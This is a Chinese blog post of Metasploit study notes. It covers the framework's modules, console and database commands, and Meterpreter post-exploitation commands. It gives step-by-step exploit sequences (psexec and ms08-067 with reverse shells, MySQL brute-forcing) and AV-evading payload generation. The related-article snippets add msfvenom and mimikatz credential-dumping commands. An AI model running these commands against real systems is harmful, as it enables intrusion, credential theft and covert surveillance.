MSF基本命令及实例

最新推荐文章于 2025-04-14 17:35:39 发布
最新推荐文章于 2025-04-14 17:35:39 发布
阅读量4k 收藏 28
点赞数 3
分类专栏: 自学笔记 文章标签: MSF metasploit 黑客 渗透 Kali Linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44371842/article/details/107187694
版权

目录

MSF基本架构

架构图

Rex

  • 基本功能库,用于完成日常基本任务,无需人工手动编码实现
  • 处理socker连接访问、协议应答(http/SSL/SMB等)
  • 编码转换(XOR、Base64、Unicode)

MSF::Core

  • 提供Msf的核心基本API,是框架的核心能力实现库

MSF::Base

  • 提供友好的API接口,便于模块调用的库

Plugin插件

  • 连接和调用外部扩展功能和系统

MSF数据库

恢复数据库

  • msfdb reinit 初始化数据库

技术功能模块(不是流程模块)

都放置在/usr/share/metasploit-framework/modules/下

  • Exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)
  • Payload:成功exploit之后,真正在目标系统执行的代码或指令
  1. Shellcode或系统命令
  2. 三种Payload:/usr/share/metasploit-framework/modules/payloads/

(1)Single:all-in-one,所有内容都在一个payload

(2)Stager:目标计算机内存有限时,先传输一个较小的payload用于建立连接

(3)Stages:利用stager建立的连接下载的后续payload

  1. Stages、Stages都有多种类型,适用于不同场景
  2. Shellcode是payload的一种,由于其建立正向/反向shell而得名
  • Auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块(没有payload的exploit模块)
  • Encoders:对payload进行加密,躲避AV检查的模块
  • Nops:提高payload稳定性及维持大小

MSF基本使用和控制台命令(MSFconsole)

更新

  • apt install metasploit-framework

地位

  • 最流行的用户接口
  • 几乎可以使用所有MSF功能
  • 控制台命令支持TAP自动补齐
  • 支持外部命令的执行(系统命令等)
  • 启动:msfconsole / 安静的启动:msfconsole -q
  • 退出:exit

帮助命令

  • help 调出所有命令
  • help workspace 查看命令详细用法
  • workspace -h
  • ? workspace

MSF控制台基本命令

  • banner —— 显示banner信息
  • color —— 启用/禁用颜色提示 —— color true/false
  • connect —— 连接服务器的指定端口获取工作在端口上工作的服务的banner信息 —— connect 192.168.1.1 80
  • show —— 展示模块信息 —— show payloads

show options ——显示需要设置的项(进入模块)

  • search —— 搜索模块 —— search ms08-067

search name:mysql cve:2020 platform:linux type:expoit

  • load —— 调用外部插件 —— load nessus
  • unload —— 删除外部插件 —— unload nessus
  • loadpath —— 调用指定目录中的其他模块 —— loadpath 路径
  • route —— 转发一个会话的其他子网的流量 —— route add 子网地址 子网掩码 sessionsID
  • ird —— 开发环境
  • resource —— 调用命令资源文件 —— 1.创建.rc文件输入一系列命令,2.msf>下,resource 路径/文件名3.也可以直接msfconsole -r 文件名

模块内基本命令

  • use —— 使用模块 —— use exploit/windows/smb/ms08_067_netapi
  • info —— 查看当前模块信息
  1. 基本信息
  2. provided by:编者
  3. Available targets:使用的系统版本
  4. Basic options:需要设置的项
  5. payload information:payload信息
  • show options —— 显示需要设置的项
  • show target —— 显示适用的系统版本
  • show payloads —— 显示适用于当前模块的payloads
  • show advanced —— 显示其他非必须项
  • show evasion —— 做混淆
  • show missing —— 显示还未设置的必须参数
  • set —— 设置参数 —— set RHOST 1.1.1.1
  • unset —— 取消设置
  • setg —— 全局设置 —— setg RHOSTS 1.1.1.1
  • unsetg —— 取消全局设置
  • save —— 保存配置信息
  • edit —— 查看或修改当前模块的源代码
  • check —— 检查目标主机漏洞是否存在(并不是所有的模块都有check命令)
  • run/exploit —— 运行模块(参数:-j表示后台执行)
  • sessions —— 如果后台执行,输入这个命令可以查看当前已经建立的会话(参数:-i 2(id)进入会话)
  • back —— 返回上一级

数据库操作

  • db_rebuild_cache —— 在数据库添加索引,加快搜索速度
  • db_disconnect —— 断开当前数据库连接
  • db_connect —— 连接数据库 —— db_connect user:pass@host:port/(或者指定配置文件完整路径,/usr/share/metasploit-framework/config/database.yml)
  • db_nmap —— 集成nmap,扫描结果会保存在数据库中 —— 参数和nmap参数一样
  1. 查询数据库主机,hosts 123.57.251.23
  2. 搜索, hosts -S linux
  3. 端口信息, services -c port(要显示的列) -p 80(要搜索的端口)
  • creds —— 查看获取到的登录的账号密码
  • vulns —— 查看数据库中已查询到的主机漏洞信息
  • loot —— 查看获取到的哈希值信息
  • db_export —— 数据库导出 —— db_export -f xml /home/kali/test.xml
  • db_import —— 数据库导入 —— db_import 文件名

Exploit模块

Active exploits(主动exploit)

利用服务器开放端口漏洞

  • 实例:利用psexec远程执行漏洞攻击windows
use exploit/windows/smb/psexec      //使用Active exploit模块
set RHOST 192.168.126.129       //配置被攻击者Ip地址
set PAYLOAD windows/shell/reverse_tcp   //配置payload
set LHOST 192.168.1.1       //配置接收反弹shell的主机地址(本机地址)
set LPORT 4444      //配置接收反弹shell的主机端口
set SMBUSER user1   //配置被攻击者的管理员账号
set SMBPASS pass1   //配置被攻击者的管理员密码
exploit     //执行

Passive exploits(被动exploit)

利用客户端程序漏洞

  • 实例:利用ani_loadimage_chunksize模块攻击windows
use exploit/windows/browser/ani_loadimage_chunksize
set SRVHOST 192.168.126.131   //设置网站地址
set URIPATH /       //设置网站路径
set PAYLOAD windows/shell/reverse_tcp   //设置payload
set LHOST 192.168.1.1       //设置监听地址
set LPORT 4444              //设置监听端口
exploit

生成payload

  • search shell_bind_tcp //搜索payload
  • use 40 //选择要使用的payload
  • show options //查看需要设置的参数,注意:在payload中,LPORT表示本地(被攻击者)要开放的端口,RHOST表示允许获取shell的远程主机IP
  • generate //生成16进制payload
  1. generate -b '\x00\xff’可以过滤掉坏字符)
  2. generate -e x86/nonalpha —— 手动指定encoder
  3. generate -b ‘\x00’ -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
  4. -b 排除坏字符,-t 输出什么格式,-e 指定encoder,-i 编码几轮,-k 不产生新的进程,-x 可以把payload绑定到的模板,-f /root/1.exe。
  • nc 192.168.1.114 4444 —— 被攻击者点击文件后,开放4444端口,直接连接即可
  • NOP(no-operation/Next Operation(无任何操作))
  1. EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行
  2. generate -s 14(给payload加上14字节的nop前缀)

Meterpreter

简介
  • 高级、动态、可扩展的Payload
  1. 基于meterpreter上下文利用更多漏洞发起攻击
  2. 后渗透测试阶段一站式操作界面
  • 完全基于内存的DLL注入式payload(不写硬盘)
  1. 注入合法系统进程并建立stager
  2. 基于Stager上传和预加载DLL进行扩展模块的注入(客户端API)
  3. 基于Stager建立的socket连接建立加密的TLS/1.0通信隧道
  4. 利用TLS隧道进一步加载后续扩展模块(避免网络取证)
  • 服务端用C语言编写
  • 客户端提供基于ruby的全特性API(支持任何语言)
常用命令
  • set payload windows/metepreter/reverse_tcp —— 配置payload的时候配置shell为meterpreter
  • windows和linux命令大部否都支持(ls,dir,cd,cat,mkdir,rmdir.mv,rm,edit(编辑类似vi))
  • help —— 帮助
  • pwd —— 查看当前空座目录
  • lpwd —— kali上当前工作目录
  • lcd —— 在kali上切换目录
  • run —— 运行脚本
  • bgrun —— 后台运行脚本 —— bgrun vnc(打开桌面监控)/sound_recorder(打开麦克风)/webcam(打开摄像头)/killav(杀死杀毒软件)/winbf(用肉机暴力破解)/
  • clearev —— 清除日志
  • download —— 下载目标系统上的文件
  • upload —— 上传文件
  • execute —— 执行文件 —— execute -f cmd.exe -i -H (-f 执行什么程序,-i 交互,-H 隐藏)
  • gituid —— 查看当前账户
  • getsystem —— 提权到system
  • getprivs —— 查看当前权限
  • getproxy —— 获取代理
  • ps —— 查看当前工作着的进程
  • getpid —— 查看自己注入的进程pid
  • migrate —— 迁移注入的进程 —— migrate 652
  • hashdump —— 获取系统账号密码hash值
  • sysinfo —— 查看系统信息
  • kill —— 杀死进程 —— kill 1052
  • reboot —— 重启
  • shutdown —— 关机
  • shell —— 获取操作系统shell
  • show_mount —— 查看硬盘使用情况
  • search —— 搜索文件 —— search -f data.ini
  • arp —— 查看arp缓存
  • netstat —— 查看端口开放情况
  • ipconfig/ifconfig —— 查看ip地址
  • idletime —— 查看操作系统空闲时间
  • resource —— 调度外部资源文件(类似msf的resource)
  • record_mic —— 记录麦克风出现的声音
  • webcam_list —— 列出靶机上连接的所有摄像头
  • webcam_snap -i -v false —— 每隔1秒拍个照
Meterpreter python扩展
  • 2015年11月份,来自社区的贡献
  • 无需运行环境,在客户端运行原生python代码
  • load python (加载插件。meterpreter>环境下)
  • Help
  • python_execute “print(“Hello world!”)”
  • python_execute “import os;cd = os.getcwd()” -r cd (-r 表示返回出来的变量)
  • python_import -f find.py

实例

暴力破解mysql数据库密码

  • 找到并使用mysql_login模块
search mysql_login
use mysql_login
  • 查看需要设置的项
show options
  • 设置主机,用户名,和密码字典
set RHOSTS 127.0.0.1
set USERNAME lrf
set BLANK_PASSWORDS true   //检测空密码
set PASS_FILE /home/kali/ruo.txt
  • 执行
run/expoit    //出现绿色加号证明成功

ms08-o67经典漏洞利用(xp)

  • 找到并使用ms08-067
search ms08_067
use ms08_067_netapi
  • 查看需要设置的项并挨个设置
show options
set RHOST 192.168.1.1
  • 查看并设置主机系统版本
show targets
set target 34
  • 查看并设置payloads
show payloads
set payload windows/shell/reverse_tcp
set lhost 192.168.1.1
  • 执行
exploit
MSF常用命令
weixin_42140534的博客
08-04 4274
0x01 msf获取shell 启动 msfconsole 搜索某个模块 search ms08-067 使用某个模块 use exploit/windows/smb/ms08-067_netapi 查看当前模块可以使用的payload[可以省略] show payloads 查看当前模块需要的参数配置 show options[可略] 选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp 设置目标的IP地址 set RHOST 192
msf 渗透基础篇(基本命令
失心少年
07-30 5942
kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
MSFMetasploit Framework)常用命令
qq_42699326的博客
12-12 1269
MSFMetasploit Framework)是一款强大的渗透测试工具,常用于漏洞利用、后门植入和信息收集等任务。
Metasploit Framework(MSF)实战宝典:从入门到精通的渗透测试全流程与案例解析 MSF简这个黑客利器工具
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-14 1086
Metasploit Framework(MSF)是一个开源的渗透测试框架,集成了漏洞利用代码(Exploit)、载荷(Payload)、辅助工具(Auxiliary)和后渗透模块(Post),被广泛应用于安全研究和渗透测试MSF通过模块化设计,简化了漏洞利用和后渗透操作,帮助测试人员快速验证系统安全性。它是渗透测试领域的核心工具之一,理解其模块和使用流程是学习的关键。准备阶段安装并更新MSF,启动msfconsole。信息收集使用Auxiliary模块扫描目标。漏洞利用。
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2709
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
MSF常用命令(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
10-09 966
MSF常用命令(非常详细),零基础入门到精通,看这一篇就够了
msf命令全集
06-05
基本命令 * `?`:帮助菜单,显示所有可用的命令 * `back`:从当前环境返回 * `banner`:显示一个 MSF 横幅 * `cd`:切换目录 * `color`:颜色转换 * `connect`:连接一个主机 * `exit`:退出 MSF * `help`:帮助...
msf命令汇总
06-21
### msf命令汇总 #### 一、MSF基础命令与...以上命令涵盖了Metasploit框架的基本使用方法以及Meterpreter的强大功能,对于渗透测试者来说非常实用,特别是对于初学者而言,这些命令可以帮助他们更快地上手并深入学习。
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2733
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msfMetasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
《web渗透测试Metasploit框架基本命令使用
m0_74100826的博客
11-19 663
Metasploit 是一个流行的渗透测试和漏洞利用框架,广泛用于安全评估、漏洞开发和渗透测试。以下是 Metasploit 框架的基本使用步骤和概念介绍。Metasploit 体系模块的灵活性和强大功能使其成为安全专业人员和渗透测试人员的重要工具。其模块化设计能够有效应对不断变化的网络安全威胁。
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1148
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msf常用命令
weixin_30846599的博客
04-13 157
获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git load mimikatz privilege::debug sekurlsa::logonPasswords full Python shell python -c "import pty;pty.spawn('/bin/ba...
msf命令
净邪的博客
03-08 3485
基础命令概览:back(返回): 从目前的情况下向后移动banner:Display an awesome metasploit bannercd: 改变当前的工作目录color: 切换颜色connect(远程连接): 与主机通信edit(编辑): ...
MetasploitMSF常用命令
m0_62783065的博客
02-06 2160
MetasploitMSF常用命令
MSF系列——简介及基本命令使用
weixin_49340699的博客
01-11 2145
MSF系列——简介及基本命令使用MSF简介模块常用命令介绍 MSF简介 Metasploi是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasplit团队一
Msf命令详解
weixin_53747497的博客
04-10 2574
portfwd - 将本地端口转发到远程服务 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。
第三章-1 MSF框架介绍与基本命令
划水的小白白
05-13 1541
本文内容: ~.Metasploit框架介绍 ~.Metasploit模块介绍 ~.基础指令 ~.msf搜索应用 ~.msf主机管理 一.Metasploit框架介绍 1,简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、 开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具 //MSF有付费版本,kali自带免费版 个人评价: 简单好用易上手,人人都可以容易得打出高危伤害 额外说明: 其
msf Windows
02-06
#### 基本命令概览 - `help`: 显示可用命令列表及其描述。 - `search <keyword>`: 查找特定类型的漏洞或模块。 - `use <module_name>`: 加载指定的exploit/payload辅助模块。 - `info <module_name>`: 获取所选模块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值